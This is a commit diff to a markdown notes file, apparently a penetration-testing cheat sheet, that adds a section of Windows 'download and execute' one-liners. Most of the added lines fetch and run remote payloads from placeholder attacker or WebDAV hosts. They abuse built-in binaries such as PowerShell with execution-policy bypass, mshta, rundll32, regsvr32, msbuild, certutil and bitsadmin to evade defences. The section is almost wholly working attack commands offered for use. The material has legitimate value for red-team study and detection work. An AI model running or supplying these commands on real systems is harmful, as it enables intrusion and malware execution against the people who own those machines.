Update filetransfers.md

mhmh55516 · May 25, 2019 · 3daa429 · 3daa429
1 parent 90219b3
commit 3daa429
Showing 1 changed file with 108 additions and 1 deletion.
diff --git a/filetransfers.md b/filetransfers.md
@@ -1,4 +1,5 @@
-Some methods to transfer files from linux to windows. Thanks to this post
+## File Transfers
+Some methods to transfer files from linux to windows. Thanks to this post
 
  https://blog.ropnop.com/transferring-files-from-kali-to-windows/
 
@@ -125,3 +126,109 @@ Need to test but this only works on 32 bit machines?
 certutil.exe -urlcache -split -f https://myserver/filename outputfilename
 ```
 
+# Windows - Download and execute methods
+
+## Downloaded files location
+
+- C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
+- C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>
+- C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
+
+## Powershell
+
+From an HTTP server
+
+```powershell
+powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
+```
+
+From a Webdav server
+
+```powershell
+powershell -exec bypass -f \\webdavserver\folder\payload.ps1
+```
+
+## Cmd
+
+```powershell
+cmd.exe /k < \\webdavserver\folder\batchfile.txt
+```
+
+## Cscript / Wscript
+
+```powershell
+cscript //E:jscript \\webdavserver\folder\payload.txt
+```
+
+## Mshta
+
+```powershell
+mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
+```
+
+```powershell
+mshta http://webserver/payload.hta
+```
+
+```powershell
+mshta \\webdavserver\folder\payload.hta
+```
+
+## Rundll32
+
+```powershell
+rundll32 \\webdavserver\folder\payload.dll,entrypoint
+```
+
+```powershell
+rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
+```
+
+## Regasm / Regsvc @subTee
+
+```powershell
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
+```
+
+## Regsvr32 @subTee
+
+```powershell
+regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
+```
+
+```powershell
+regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
+```
+
+## Odbcconf
+
+```powershell
+odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
+```
+
+## Msbuild
+
+```powershell
+cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
+```
+
+## Certutil
+
+```powershell
+certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
+```
+
+```powershell
+certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
+```
+
+## Bitsadmin
+
+```powershell
+bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
+```
+
+
+## References
+
+- [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)